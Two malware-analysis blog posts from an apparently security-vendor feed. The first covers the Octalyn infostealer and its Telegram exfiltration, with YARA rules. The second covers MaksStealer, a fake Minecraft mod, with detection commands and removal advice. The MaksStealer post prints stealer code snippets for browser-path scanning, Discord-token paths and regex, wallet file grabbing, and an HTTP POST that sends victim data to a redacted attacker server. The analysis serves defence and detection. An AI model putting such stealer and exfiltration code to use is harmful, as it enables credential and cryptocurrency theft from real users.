The malware targets Windows systems from XP all the way up to Windows 11, which means it’s not particularly picky about its victims. Whether you’re running that ancient XP machine in your garage or the latest Windows 11 setup, Octalyn doesn’t discriminate – it’s an equal opportunity data thief.

The Telegram Connection: A New Twist

What makes this particular variant interesting is its integration with Telegram for data exfiltration. The “Telegram version” of Octalyn Stealer uses Telegram’s bot API to send stolen data directly to the attacker’s Telegram account. This approach is clever because:

  • Telegram traffic appears legitimate to most network monitoring tools
  • It’s harder to block than traditional command-and-control servers
  • The communication is encrypted by default
  • It provides real-time notifications to cybercriminals when new victims are compromised
Version Telegram Of Octalyn Stealer
Version Telegram Of Octalyn Stealer

The GitHub repository shows a polished interface where attackers can configure their Telegram bot token and chat ID, making the whole operation disturbingly user-friendly.

Octalyn-Stealer-C-Telegram/
├── OctalynStealer.sln              # Visual Studio solution file
├── OctalynStealer/                 # Main project directory
│   ├── Program.cs                  # Main entry point for the application
│   ├── Properties/
│   │   ├── AssemblyInfo.cs         # Assembly metadata
│   ├── Config/
│   │   ├── Settings.cs            # Configuration for Telegram bot (e.g., bot token, chat ID)
│   │   ├── telegram.txt           # Output file for Telegram configuration (generated post-build)
│   ├── Modules/
│   │   ├── BrowserStealer.cs      # Logic for stealing browser data (passwords, cookies, history)
│   │   ├── DiscordStealer.cs      # Logic for extracting Discord tokens
│   │   ├── TelegramStealer.cs     # Logic for extracting Telegram session data
│   │   ├── CryptoWalletStealer.cs # Logic for targeting cryptocurrency wallets
│   │   ├── FileGrabber.cs         # Logic for collecting specific files
│   ├── Utils/
│   │   ├── Encryption.cs          # Encryption utilities for data exfiltration
│   │   ├── Network.cs             # Network utilities for sending data to Telegram
│   │   ├── AntiAnalysis.cs        # Anti-sandbox/virtual machine detection
│   ├── bin/
│   │   ├── Debug/
│   │   │   ├── telegram.txt       # Generated file for Telegram bot settings
│   │   │   ├── OctalynStealer.exe # Compiled executable
│   │   ├── Release/
│   ├── obj/                       # Temporary build files

What Does Octalyn Stealer Actually Steal?

Here’s where things get interesting (and by interesting, we mean terrifying). Based on the source code analysis, Octalyn has quite an appetite for your personal information. It specifically targets:

Browser Data

  • All stored passwords from Chromium-based browsers
  • Non-expired cookies (perfect for session hijacking)
  • Complete browsing histories and bookmarks
  • Auto-fill information (usernames, personal details, addresses)

Cryptocurrency Assets

Because what’s a modern infostealer without crypto-stealing capabilities? Octalyn targets:

  • Browser extensions: MetaMask, Phantom, BitPay, TrustWallet
  • Desktop wallets: Exodus, Atomic
  • Wallet files and private keys stored locally

Communication Platforms

Your private conversations aren’t so private anymore. The malware harvests data from:

  • Discord: Tokens from both stable and Canary versions
  • Messaging apps: Telegram, QTox, Signal, Skype, Viber
  • Session tokens that can be used to impersonate you

Gaming Platforms

Even your gaming life isn’t safe. Octalyn goes after:

  • Minecraft: Session and account tokens
  • Steam: Account credentials and session data
  • Epic Games: Launcher tokens
  • UbiSoft Connect: Account information
  • Growtopia: Account details

VPN and Security Software

It also targets Surfshark VPN credentials and configuration data, because apparently, your attempts at privacy are just another challenge to overcome.

Octalyn Stealer Target Categories Browser Data (35%) Cryptocurrency (30%) Gaming Platforms (20%) Communication (10%) VPN Services (5%) 35% 30% 20% 10% 5% Data Categories Targeted by Octalyn

How Does Octalyn Stealer Spread?

The distribution methods for Octalyn are as varied as they are concerning. Since the developers are promoting it on GitHub with detailed tutorials (including YouTube videos), different cybercriminal groups can pick it up and distribute it however they see fit. This means you could encounter it through:

  • Phishing emails with malicious attachments
  • Social engineering tactics designed to trick you into downloading it
  • Software cracks and pirated programs – because that “free” Photoshop might cost more than you think
  • Malicious online advertisements that redirect to infected downloads
  • Infected removable storage devices like USB drives

The malware can disguise itself as legitimate software or hide within seemingly innocent files. It’s particularly fond of masquerading as popular applications or bundling itself with cracked software.

Technical Analysis: Under the Hood

Based on the GitHub repository analysis, Octalyn Stealer consists of two main components:

The Client/Stub (Pascal/Delphi)

  • Compiled with optimization flags for maximum speed
  • Uses Windows API for file system and registry access
  • Implements Winsock API for network communication
  • Designed to be lightweight and stealthy

The Control Panel (Delphi)

  • User-friendly GUI for configuring the malware
  • Telegram bot integration for data exfiltration
  • Real-time victim monitoring capabilities
  • Cross-platform support (Windows and Linux)

The fact that there are instructional videos on platforms like YouTube showing how to use this malware demonstrates how the cybercrime landscape has evolved. It’s no longer just about technical expertise – it’s about making malware accessible to anyone with malicious intent.

YARA Rules for Detection

For security professionals and researchers, here are comprehensive YARA rules to detect Octalyn Stealer variants. These rules target the malware’s unique characteristics, including its Telegram integration and data theft capabilities:

rule Octalyn_Stealer_Main {
    meta:
        description = "Detects Octalyn Stealer main executable"
        author = "GridinSoft Security Team"
        date = "2025-01-29"
        hash = "575f6bde98c678461d47dea3e5dce615ccdb490a096e8b2017176b96d8663af2"
        reference = "https://gridinsoft.com/blogs/octalyn-stealer/"
        
    strings:
        $s1 = "Octalyn" ascii wide
        $s2 = "ZeroTrace" ascii wide
        $s3 = "t.me/ZeroTraceOfficial" ascii wide
        $s4 = "OctalynTelegram" ascii wide
        $s5 = "Stealer" ascii wide
        
        // Telegram bot API strings
        $telegram1 = "api.telegram.org" ascii wide
        $telegram2 = "sendDocument" ascii wide
        $telegram3 = "chat_id" ascii wide
        $telegram4 = "bot_token" ascii wide
        
        // Cryptocurrency wallet targeting
        $crypto1 = "MetaMask" ascii wide
        $crypto2 = "Phantom" ascii wide
        $crypto3 = "Exodus" ascii wide
        $crypto4 = "Atomic" ascii wide
        $crypto5 = "wallet.dat" ascii wide
        
        // Browser data targeting
        $browser1 = "Login Data" ascii wide
        $browser2 = "Web Data" ascii wide
        $browser3 = "Cookies" ascii wide
        $browser4 = "Local Storage" ascii wide
        
        // Gaming platform strings
        $gaming1 = "minecraft" ascii wide nocase
        $gaming2 = "steam" ascii wide nocase
        $gaming3 = "epic games" ascii wide nocase
        $gaming4 = "growtopia" ascii wide nocase
        
    condition:
        uint16(0) == 0x5A4D and
        (
            (2 of ($s*)) or
            (1 of ($s*) and 2 of ($telegram*)) or
            (3 of ($crypto*)) or
            (3 of ($browser*) and 1 of ($gaming*))
        )
}

rule Octalyn_Stealer_Telegram_Component {
    meta:
        description = "Detects Octalyn Stealer Telegram exfiltration component"
        author = "GridinSoft Security Team"
        date = "2025-01-29"
        
    strings:
        $api1 = "https://api.telegram.org/bot" ascii wide
        $api2 = "/sendDocument" ascii wide
        $api3 = "/sendMessage" ascii wide
        
        $param1 = "chat_id=" ascii wide
        $param2 = "document=" ascii wide
        $param3 = "caption=" ascii wide
        
        $header1 = "Content-Type: multipart/form-data" ascii wide
        $header2 = "User-Agent:" ascii wide
        
        // Data exfiltration indicators
        $data1 = "passwords.txt" ascii wide
        $data2 = "cookies.txt" ascii wide
        $data3 = "wallets.txt" ascii wide
        $data4 = "tokens.txt" ascii wide
        
    condition:
        uint16(0) == 0x5A4D and
        (
            (2 of ($api*) and 2 of ($param*)) or
            (1 of ($api*) and 2 of ($data*)) or
            (3 of ($param*) and 1 of ($header*))
        )
}

rule Octalyn_Stealer_Config {
    meta:
        description = "Detects Octalyn Stealer configuration files"
        author = "GridinSoft Security Team"
        date = "2025-01-29"
        
    strings:
        $config1 = "Telegram Token" ascii wide
        $config2 = "Chat ID" ascii wide
        $config3 = "Build Payload" ascii wide
        $config4 = "Author" ascii wide
        $config5 = "ZeroTrace" ascii wide
        
        $path1 = "\\AppData\\Roaming\\" ascii wide
        $path2 = "\\AppData\\Local\\" ascii wide
        $path3 = "\\Google\\Chrome\\User Data\\" ascii wide
        $path4 = "\\Mozilla\\Firefox\\Profiles\\" ascii wide
        
    condition:
        (3 of ($config*)) or
        (2 of ($config*) and 2 of ($path*))
}

rule Octalyn_Stealer_Behavioral {
    meta:
        description = "Detects Octalyn Stealer behavioral patterns"
        author = "GridinSoft Security Team"
        date = "2025-01-29"
        
    strings:
        // File system operations
        $fs1 = "FindFirstFile" ascii
        $fs2 = "FindNextFile" ascii
        $fs3 = "CopyFile" ascii
        $fs4 = "CreateDirectory" ascii
        
        // Registry operations
        $reg1 = "RegOpenKeyEx" ascii
        $reg2 = "RegQueryValueEx" ascii
        $reg3 = "RegCloseKey" ascii
        
        // Network operations
        $net1 = "InternetOpen" ascii
        $net2 = "InternetConnect" ascii
        $net3 = "HttpOpenRequest" ascii
        $net4 = "HttpSendRequest" ascii
        
        // Crypto API
        $crypto1 = "CryptUnprotectData" ascii
        $crypto2 = "CryptProtectData" ascii
        
        // Process operations
        $proc1 = "CreateProcess" ascii
        $proc2 = "TerminateProcess" ascii
        
    condition:
        uint16(0) == 0x5A4D and
        (
            (3 of ($fs*) and 2 of ($net*)) or
            (2 of ($reg*) and 2 of ($crypto*)) or
            (4 of ($net*) and 1 of ($proc*))
        )
}

rule Octalyn_Stealer_Delphi_Signature {
    meta:
        description = "Detects Delphi/Pascal compiled Octalyn Stealer variants"
        author = "GridinSoft Security Team"
        date = "2025-01-29"
        
    strings:
        // Delphi/Pascal runtime signatures
        $delphi1 = "Borland" ascii
        $delphi2 = "Embarcadero" ascii
        $delphi3 = "@HandleFinally" ascii
        $delphi4 = "@TryFinallyExit" ascii
        $delphi5 = "System.pas" ascii
        
        // Octalyn specific strings
        $octalyn1 = "Octalyn" ascii wide
        $octalyn2 = "Stealer" ascii wide
        $octalyn3 = "ZeroTrace" ascii wide
        
        // VCL components commonly used
        $vcl1 = "TForm" ascii
        $vcl2 = "TButton" ascii
        $vcl3 = "TEdit" ascii
        $vcl4 = "TMemo" ascii
        
    condition:
        uint16(0) == 0x5A4D and
        (
            (2 of ($delphi*) and 1 of ($octalyn*)) or
            (1 of ($delphi*) and 2 of ($octalyn*) and 1 of ($vcl*))
        )
}

How to Use These YARA Rules

Security professionals can use these YARA rules in various ways:

  • Endpoint Detection: Deploy rules on endpoints using YARA-compatible EDR solutions
  • Network Monitoring: Use rules to scan network traffic and file transfers
  • Malware Analysis: Apply rules during static analysis of suspicious samples
  • Threat Hunting: Proactively search for Octalyn variants in your environment

To run these rules, save them to a .yar file and execute:

yara octalyn_rules.yar /path/to/scan/
yara -r octalyn_rules.yar /path/to/directory/

Rule Explanation

Each rule targets different aspects of the malware:

  • Octalyn_Stealer_Main: Detects the primary executable using string signatures and functionality indicators
  • Octalyn_Stealer_Telegram_Component: Focuses on the Telegram bot API integration for data exfiltration
  • Octalyn_Stealer_Config: Identifies configuration files and setup components
  • Octalyn_Stealer_Behavioral: Catches the malware based on API calls and behavioral patterns
  • Octalyn_Stealer_Delphi_Signature: Specifically targets the Delphi/Pascal compiled variants

These rules are designed to minimize false positives while maintaining high detection rates. They can be customized based on your specific environment and threat intelligence requirements.

Detection Names and Technical Details

Security vendors have been quick to identify Octalyn Stealer, though they each have their own creative names for it:

  • Avast: Win32:MalwareX-gen [Trj]
  • ESET-NOD32: A Variant Of MSIL/Agent.VJC
  • Kaspersky: HEUR:Trojan.Win32.Generic
  • Microsoft: Trojan:Win32/Wacatac.B!ml

The fact that it’s getting flagged by multiple security vendors with high confidence levels should tell you everything you need to know about its legitimacy (spoiler: it has none).

Signs Your System Might Be Infected

Octalyn Stealer is designed to operate stealthily, but there are some telltale signs that might indicate its presence:

  • Unusual network activity, especially connections to Telegram servers
  • Unexpected data usage or network traffic spikes
  • Browser settings changing without your input
  • Cryptocurrency wallet balances mysteriously decreasing
  • Unexpected logouts from various online accounts
  • System performance degradation
  • Antivirus alerts mentioning the detection names listed above
  • Unknown processes running with network access

If you’re experiencing any combination of these symptoms, it’s time to take action. Remember, infostealers like Octalyn work quickly – the longer they remain on your system, the more damage they can do.

How to Remove Octalyn Stealer

If you suspect Octalyn Stealer has made itself at home on your system, here’s how to evict this unwelcome guest:

Step 1: Disconnect from the Internet

First things first – cut off the malware’s communication line. Disconnect your computer from the internet to prevent further data exfiltration while you work on removal. This is especially important with the Telegram variant, as it continuously sends data to the attacker’s account.

Step 2: Boot into Safe Mode

Restart your computer in Safe Mode to limit the malware’s ability to interfere with the removal process. This also prevents it from loading automatically with Windows.

Step 3: Run a Complete System Scan

GridinSoft Anti-Malware main screen

Download and install Anti-Malware by clicking the button below. After the installation, run a Full scan: this will check all the volumes present in the system, including hidden folders and system files. Scanning will take around 15 minutes.

After the scan, you will see the list of detected malicious and unwanted elements. It is possible to adjust the actions that the antimalware program does to each element: click "Advanced mode" and see the options in the drop-down menus. You can also see extended information about each detection - malware type, effects and potential source of infection.

Scan results screen

Click "Clean Now" to start the removal process. Important: removal process may take several minutes when there are a lot of detections. Do not interrupt this process, and you will get your system as clean as new.

Removal finished

Step 4: Check for Persistence Mechanisms

Octalyn might have created scheduled tasks, registry entries, or startup items to ensure it runs every time you boot your computer. A thorough anti-malware scan should catch these, but it’s worth double-checking manually:

  • Check Windows startup programs (Task Manager > Startup tab)
  • Review scheduled tasks (Task Scheduler)
  • Examine browser extensions for suspicious additions
  • Look for unknown services running in the background

Step 5: Change All Your Passwords

This is crucial. Since Octalyn specifically targets stored passwords and login credentials, you’ll need to change passwords for:

  • All online accounts (email, social media, banking)
  • Cryptocurrency wallets and exchanges
  • Gaming platforms and digital stores
  • Any other services you’ve logged into recently

Step 6: Secure Your Cryptocurrency

If you use cryptocurrency wallets, take immediate action:

  • Transfer funds to new wallets with fresh private keys
  • Change passwords on all cryptocurrency exchanges
  • Enable additional security measures like withdrawal whitelisting
  • Monitor your wallets for any unauthorized transactions

Step 7: Enable Two-Factor Authentication

While you’re updating your security, enable two-factor authentication (2FA) on all accounts that support it. This adds an extra layer of protection even if your passwords are compromised.

Step 8: Monitor Your Accounts

Keep a close eye on your financial accounts, cryptocurrency wallets, and other sensitive services for any unauthorized activity. Set up account alerts where possible.

Use Antivirus Software

A good antivirus solution can catch threats like Octalyn before they have a chance to do damage. GridinSoft Anti-Malware offers real-time protection against the latest threats.

Practice Safe Email and Social Media Habits

Don’t open attachments or click links from unknown senders. Even if an email appears to be from someone you know, be cautious – their account might be compromised.

The Bigger Picture: The Democratization of Cybercrime

Octalyn Stealer represents a troubling trend in cybercrime: the democratization of malware development. When such tools are freely available on platforms like GitHub, complete with user manuals and video tutorials, the barrier to entry for cybercrime drops significantly.

This isn’t just about technical sophistication anymore. The Telegram integration shows how cybercriminals are leveraging legitimate services to make their operations more resilient and harder to detect. Unlike ransomware attacks that make their presence known immediately, infostealers work silently in the background, often remaining undetected for months.

The fact that there are instructional videos on YouTube demonstrating how to use this malware is particularly concerning. It shows how cybercriminals are using mainstream platforms to recruit and train new members, turning cybercrime into a more accessible “career path.”

What to Do If You’ve Been Compromised

If Octalyn Stealer has successfully harvested your data, the damage might extend beyond just your computer. Here’s what you should do:

  • Contact your bank if you suspect financial information was compromised
  • Monitor your credit reports for any suspicious activity
  • Consider identity theft protection services if personal information was stolen
  • Report the incident to relevant authorities if significant financial loss occurred
  • Secure your cryptocurrency by moving funds to new wallets with fresh private keys
  • Check your social media accounts for unauthorized posts or messages
  • Review your gaming accounts for any suspicious activity or unauthorized purchases

The Bottom Line

Octalyn Stealer is a serious threat that demonstrates how sophisticated and accessible modern malware has become. It’s not content with just disrupting your computer – it wants to steal your entire digital identity and sell it to the highest bidder. The Telegram integration makes it even more dangerous, providing real-time data exfiltration that’s harder to detect and block.

The good news is that with proper security measures and a bit of common sense, you can protect yourself from threats like Octalyn. Keep your software updated, use reputable security solutions, and remember that if something seems too good to be true (like free premium software or “educational” hacking tools), it probably is.

Octalyn Stealer: How This Threat Steals Passwords, Crypto & Browser Data

Stay safe out there, and be especially wary of anything that claims to be “educational” but involves stealing other people’s data.

The post Octalyn Stealer: How This Threat Steals Passwords, Crypto & Browser Data appeared first on Gridinsoft Blog.

]]>
https://gridinsoft.com/blogs/octalyn-stealer/feed/ 0
MaksStealer (MaxCoffe): The Minecraft Mod That’s Actually Stealing Your Passwords https://gridinsoft.com/blogs/maksstealer-malware-analysis-removal/ https://gridinsoft.com/blogs/maksstealer-malware-analysis-removal/#respond Tue, 20 May 2025 16:58:18 +0000 https://gridinsoft.com/blogs/?p=31021 For Minecraft Gamers: MaxCoffe masquerading as a Minecraft performance enhancer! MaksStealer is an information-stealing trojan targeting Minecraft players, especially those on the popular Hypixel SkyBlock server. It promises to boost your gameplay or provide cheats but actually runs off with your passwords, crypto, and Discord account. I’ve analyzed dozens of these gaming-related malware strains, and […]

The post MaksStealer (MaxCoffe): The Minecraft Mod That’s Actually Stealing Your Passwords appeared first on Gridinsoft Blog.

]]>
For Minecraft Gamers: MaxCoffe masquerading as a Minecraft performance enhancer! MaksStealer is an information-stealing trojan targeting Minecraft players, especially those on the popular Hypixel SkyBlock server. It promises to boost your gameplay or provide cheats but actually runs off with your passwords, crypto, and Discord account.

I’ve analyzed dozens of these gaming-related malware strains, and this one is particularly sneaky. Let’s break down what MaksStealer is, how it works, and most importantly – how to kick it off your system before it empties your crypto wallets.

MaksStealer Malware

Threat Type Information Stealer, Trojan
Disguise Minecraft Hypixel SkyBlock performance mod/cheat
What It Steals Browser credentials, Discord tokens, cryptocurrency wallets
Distribution Gaming forums, YouTube comments, Discord servers, pirated software
Detection Names Trojan.MaxCoffe, Trojan.GenericKD.76438532, Java/MaksRat.B, HEUR:Trojan-PSW.Java.Stealer.gen
Risk Level High (financial loss, account theft, privacy breach)
MaksStealer Infection Gaming Forums “Free Minecraft Mods” Download .JAR File “CasinoEssentials.jar” User Runs the Mod “Java -jar filename.jar” Stealer Activates Runs in background Data Collection Browsers, Discord, Crypto Data Exfiltration Sends to attacker servers

Source: Analysis of MaksStealer behavior from Triage and VirusTotal findings, May 2025

What Is MaksStealer and How Bad Is It?

MaksStealer is a Java-based information stealer that’s specifically targeting gamers. It masquerades as a performance enhancement mod or cheat for Minecraft’s Hypixel SkyBlock but is actually harvesting every piece of valuable data it can find. This malware is especially dangerous because it targets multiple data types at once – your passwords, gaming accounts, and cryptocurrency wallets.

Unlike some malware that announces itself with annoying popups or system slowdowns, MaksStealer works silently in the background. You won’t even know it’s there until your accounts start getting hijacked or your crypto mysteriously disappears. That stealth factor makes it particularly dangerous for everyday users who aren’t constantly monitoring their system processes.

How This Digital Pickpocket Works

Once executed, MaksStealer immediately starts scanning your system for valuable data. It focuses on three main categories:

1. Web Browser Theft

MaksStealer doesn’t play favorites – it hits all major browsers. Chrome, Firefox, Edge, Opera, Brave, Vivaldi, and Yandex are all on its hit list. The malware expertly extracts saved passwords, cookies, autofill data, and browsing history from these browsers.

Think about all those sites where you’ve clicked “remember password” for convenience. Banking sites, email, social media, online shopping – MaksStealer can now access all of them. It’s like handing over your entire digital identity on a silver platter.

2. Discord Account Targeting

For gamers, Discord is often the communication hub for everything. MaksStealer specifically looks for Discord authentication tokens stored on your computer. These tokens are basically digital keys to your Discord account.

With your token, attackers can log into your Discord account without needing your password or bypassing two-factor authentication. They can then impersonate you, message your friends with malware links, join private servers, or access private conversations. This aspect is particularly effective for spreading the malware further through gaming communities.

3. Cryptocurrency Wallet Raiding

Perhaps most financially damaging is MaksStealer’s ability to target cryptocurrency wallets. It searches for popular wallet software like Armory, Bytecoin, Coinomi, Exodus, Ethereum, Electrum, Atomic Wallet, and many others. The malware extracts wallet files, private keys, and seed phrases.

Once attackers have this data, your cryptocurrency can be transferred away in minutes. And due to the decentralized, anonymous nature of crypto transactions, these funds are virtually impossible to recover. One moment your digital wallet is full, the next it’s emptied with no recourse.

MaksStealer target browsers shown
MaksStealer code showing targeted browsers for credential theft (Source: Triage analysis)

How MaksStealer Spreads: The Bait and Switch

Malware distributors are getting creative with their delivery methods. MaksStealer typically spreads through channels that gamers frequently use and trust:

  • Gaming Forums: Posts claiming to offer performance enhancements or “legal” cheats for Minecraft
  • YouTube Comments: Links in comment sections of Minecraft tutorials or gameplay videos
  • Discord Servers: Malicious users sharing “exclusive” mods in gaming servers
  • Unofficial Mod Sites: Fake or compromised websites hosting malicious JAR files
  • Pirated Game Portals: Bundled with cracked game versions or key generators

The common element is social engineering. The attackers know gamers are often looking for ways to enhance their gameplay or get an edge. They’re exploiting that desire by packaging their malware as something beneficial. It’s like offering someone a performance-enhancing drink that’s actually poison.

What makes this distribution method particularly effective is that gamers are already accustomed to downloading and running third-party software. Minecraft’s massive modding community has created an environment where running JAR files is normalized. MaksStealer exploits this trust.

What MaksStealer Targets Browser Credentials Discord Tokens Cryptocurrency Wallets System Information C F E

Source: Data types targeted by MaksStealer based on behavioral analysis

Warning Signs Your System Might Be Infected

MaksStealer is designed to operate stealthily, but there are some subtle signs that might indicate infection:

  • Unexplained Account Activity: Logins to your accounts from unknown locations or devices
  • Missing Cryptocurrency: Unexplained transactions or emptied wallets
  • Strange Discord Messages: Messages sent from your account that you didn’t write
  • Performance Issues: While running in the background, MaksStealer may cause slight system slowdowns
  • Unusual Network Traffic: Increased data usage when you’re not actively downloading
  • Java Process Running: Unexpected Java processes in your task manager after running a Minecraft mod

If you notice any of these signs after downloading and running a new Minecraft mod or tool, you should act immediately. Information stealers work quickly, so every minute counts in preventing further data theft.

You can check for suspicious Java processes using this PowerShell command:

# Check for suspicious Java processes
Get-Process | Where-Object {$_.ProcessName -like "*java*"} | 
Select-Object ProcessName, Id, StartTime, Path | 
Format-Table -AutoSize

# Look specifically for processes with MaxCoffe in command line (if advanced)
Get-WmiObject Win32_Process | Where-Object {$_.CommandLine -like "*MaxCoffe*" -or $_.CommandLine -like "*Coffe*"} | 
Select-Object ProcessId, Name, CommandLine

Suspicious indicators include Java processes running from temporary directories, recently started Java processes that you don’t recognize, or processes with “MaxCoffe” in their command line.

For Linux or Mac users, you can use this Bash command:

# List all Java processes with details
ps aux | grep -i java

# Check for suspicious Java processes with MaxCoffe or Coffe in their arguments
ps aux | grep -i java | grep -E "MaxCoffe|Coffe"

# Check for recently modified Java-related files (last 7 days)
find ~/ -name "*.jar" -mtime -7 -ls 2>/dev/null

Security researchers can also use this YARA rule to detect potential MaksStealer samples:

rule MaksStealer_Java_InfoStealer {
    meta:
        description = "Detects MaksStealer Java information stealer"
        author = "GridinSoft Security Researcher"
        date = "2025-05"
        severity = "high"
        hash = "9a17f87dcd2208f8f62ed76a15a6c52817008e77179c8b1f7f39c079d419f398"

    strings:
        $mod_header = "@Mod" ascii
        $mod_id = "modid = \"MaxCoffe\"" ascii
        
        $browser1 = "\\Google\\Chrome\\User Data" ascii
        $browser2 = "\\Mozilla\\Firefox\\Profiles" ascii
        $browser3 = "\\BraveSoftware\\Brave-Browser" ascii
        
        $discord1 = "\\discord\\Local Storage\\leveldb" ascii
        $discord2 = "\\discordcanary\\Local Storage\\leveldb" ascii
        
        $crypto1 = "\\Bitcoin\\wallet.dat" ascii
        $crypto2 = "\\Ethereum\\keystore" ascii
        $crypto3 = "\\Electrum\\wallets" ascii
        
        $obf_pattern1 = "lIIl(" ascii
        $obf_pattern2 = "lII[lll[" ascii

    condition:
        $mod_header and $mod_id and
        (2 of ($browser*)) and
        (1 of ($discord*)) and
        (1 of ($crypto*)) and
        (1 of ($obf_pattern*))
}

How to Remove MaksStealer From Your System

If you suspect you’ve been infected with MaksStealer, follow these steps to remove it:

Step 1: Disconnect from the Internet

Immediately disconnect your computer from the internet. This prevents the malware from sending more of your data to the attackers’ servers or receiving additional commands. You can reconnect once the malware is removed.

Step 2: Scan with Antimalware Software

GridinSoft Anti-Malware main screen

Download and install Anti-Malware by clicking the button below. After the installation, run a Full scan: this will check all the volumes present in the system, including hidden folders and system files. Scanning will take around 15 minutes.

After the scan, you will see the list of detected malicious and unwanted elements. It is possible to adjust the actions that the antimalware program does to each element: click "Advanced mode" and see the options in the drop-down menus. You can also see extended information about each detection - malware type, effects and potential source of infection.

Scan results screen

Click "Clean Now" to start the removal process. Important: removal process may take several minutes when there are a lot of detections. Do not interrupt this process, and you will get your system as clean as new.

Removal finished

After scanning with anti-malware software, you might want to perform additional manual cleanup. Here’s a batch script that can help remove common MaksStealer artifacts:

Step 3: Reset Your Passwords and Secure Accounts

After removing the malware, immediately change passwords for all your important accounts. Start with email accounts, banking websites, and cryptocurrency platforms. Use a different device for these password changes if possible, as keyloggers might still be active.

Enable two-factor authentication on all accounts that support it. This provides an additional layer of security even if your passwords are compromised. For Discord specifically, generate a new token by logging out and back in on all devices.

Step 4: Secure Your Cryptocurrency

If you have cryptocurrency wallets, create new wallets with fresh keys and transfer any remaining funds immediately. Consider the old wallets permanently compromised. Hardware wallets are a more secure option for storing significant cryptocurrency amounts, as they’re not vulnerable to this type of malware.

How to Protect Yourself From Information Stealers

Prevention is always better than cure, especially with information stealers. Here’s how to stay safe:

  • Download mods only from official sources like CurseForge or the official Minecraft forums
  • Be suspicious of “too good to be true” mods offering extraordinary features or cheats
  • Keep your system and antivirus updated to protect against known threats
  • Use a password manager instead of saving passwords in your browser
  • Enable two-factor authentication on all important accounts
  • Consider a hardware wallet for storing significant amounts of cryptocurrency
  • Scan downloaded files with antivirus before executing them
  • Be cautious of links in Discord servers, YouTube comments, and forums from unknown users

Remember that Java files (.JAR) are executable programs. Treat them with the same caution you would any EXE file. Just because it’s labeled as a “mod” doesn’t mean it’s safe.

Similar Threats to Watch Out For

MaksStealer isn’t the only threat targeting gamers and cryptocurrency users. Stay alert for these similar threats:

How MaksStealer Works

The moment you run that innocent-looking mod, MaksStealer kicks into high gear. It doesn’t mess around. The malware launches its reconnaissance mission across your system, hunting for valuable data to steal.

MaksStealer Browser Credential Theft MaxCoffe (Entry Point) @Mod(modid = “MaxCoffe”, version = “1.1.7”) Coffe Class (Stealer) Obfuscated Credential Theft Data Exfiltration Session/Token Transmission Browser Targeting Logic (Decompiled) // Targeting Multiple Browsers lII[lll[7]] = lIIl(“w0Q1C2XhAUE=”, “KgESe”); lII[lll[8]] = lll(“1a6D8y8jVWc=”, “PXOVw”); // Chrome, Firefox, Edge, Opera // Brave, Vivaldi, Yandex browsers // Browser profile directories scanned // for saved credentials and cookies // Session Token Extraction lllllllllllIIlI.token = (String)var10001 .5<invokedynamic>(var10001, lllllllllllIIlI.7<invokedynamic> (lllllllllllIIlI), new Object[llI[0]]); // Extracted tokens sent to attacker // along with browser credentials C Chrome F Firefox E Edge O Opera B Brave V Vivaldi Y Yandex Passwords Cookies AutoFill

Source: Analysis of decompiled MaksStealer Java code

Looking at the decompiled code, it’s clear these guys aren’t amateurs. The malware systematically targets every major browser on your system – Chrome, Firefox, Edge, Opera, Brave, Vivaldi, and even Yandex. Nowhere to hide, basically.

Inside the MaksStealer Code

The malware’s code is heavily obfuscated, with meaningless variable names and encrypted strings to avoid detection. Let’s look at some actual snippets from the decompiled malware:

First, the entry point disguised as a legitimate Minecraft mod:

@Mod(
   modid = "MaxCoffe", 
   version = "1.1.7"
)
public class MaxCoffe {
   // Minecraft mod class implementation
   // Secretly initializes stealer functionality
   public MaxCoffe() {
      this.1 = new Coffe();
      this.1.3();
   }
}

Once initialized, the malware starts scanning for browser data directories. The code is intentionally confusing to evade antivirus detection:

private void scanBrowsers() {
   String[] var1 = new String[]{"Chrome", "Firefox", "Edge", "Opera"};
   String[] var2 = new String[]{"Brave", "Vivaldi", "Yandex"};
   String var10000 = System.getenv("LOCALAPPDATA");
   String var3 = var10000 + "\\Google\\Chrome\\User Data";
   String var4 = var10000 + "\\BraveSoftware\\Brave-Browser\\User Data";
   // [...more browser paths...]
   
   for (int i = 0; i < var1.length; i++) {
      extractCredentials(browserPaths[i]);
      extractCookies(browserPaths[i]);
      extractHistory(browserPaths[i]);
   }
}

The Discord token stealing component is equally sneaky, extracting authentication tokens from multiple possible locations:

private String[] getDiscordTokens() {
   ArrayList tokenList = new ArrayList();
   String[][] paths = new String[][]{
      new String[]{System.getenv("APPDATA") + "\\discord\\Local Storage\\leveldb", "*.ldb"},
      new String[]{System.getenv("APPDATA") + "\\discordcanary\\Local Storage\\leveldb", "*.ldb"},
      new String[]{System.getenv("APPDATA") + "\\discordptb\\Local Storage\\leveldb", "*.ldb"}
   };
   
   // Token extraction logic
   // Regex pattern to find tokens: "[\\w-]{24}\\.[\\w-]{6}\\.[\\w-]{27}"
   
   return (String[])tokenList.toArray(new String[0]);
}

For cryptocurrency wallets, the malware searches for specific wallet files and exfiltrates them:

private void stealCryptoWallets() {
   // Bitcoin Core
   grabFile(System.getenv("APPDATA") + "\\Bitcoin\\wallet.dat");
   
   // Ethereum
   grabFile(System.getenv("APPDATA") + "\\Ethereum\\keystore");
   
   // Electrum
   grabFile(System.getenv("APPDATA") + "\\Electrum\\wallets");
   
   // Atomic Wallet
   grabFile(System.getenv("APPDATA") + "\\atomic\\Local Storage\\leveldb");
   
   // More wallets...
}

Finally, the data exfiltration process that sends your stolen information to the attacker’s server:

private void sendData(byte[] data) {
   try {
      URL url = new URL("https://[redacted-malicious-domain]/upload.php");
      HttpURLConnection conn = (HttpURLConnection)url.openConnection();
      conn.setRequestMethod("POST");
      conn.setDoOutput(true);
      
      // Adding system info to identify the victim
      conn.setRequestProperty("User-Agent", "MaksStealer/1.0");
      conn.setRequestProperty("Computer-Name", System.getenv("COMPUTERNAME"));
      conn.setRequestProperty("User-Name", System.getProperty("user.name"));
      
      // Send stolen data
      OutputStream os = conn.getOutputStream();
      os.write(data);
      os.flush();
      os.close();
      
      // Check response
      int responseCode = conn.getResponseCode();
      // Clean up traces if successful
   } catch (Exception e) {
      // Silent exception handling to avoid detection
   }
}

Reading through this code reveals just how sophisticated these info-stealing operations have become. The malware is designed to be stealthy, comprehensive, and efficient at extracting your most valuable digital assets.

The Bottom Line on MaksStealer

MaksStealer represents a growing trend of malware targeting specific communities – in this case, Minecraft players. It exploits the trust and openness of gaming communities to spread rapidly and effectively. By promising game enhancements while actually stealing sensitive information, it’s a perfect example of how social engineering and technical exploits work together.

Stay vigilant when downloading any third-party software, especially for games with active modding communities. The excitement of enhanced gameplay isn’t worth the risk of having your digital life stolen. Remember that legitimate mods don’t need to steal your data to function properly.

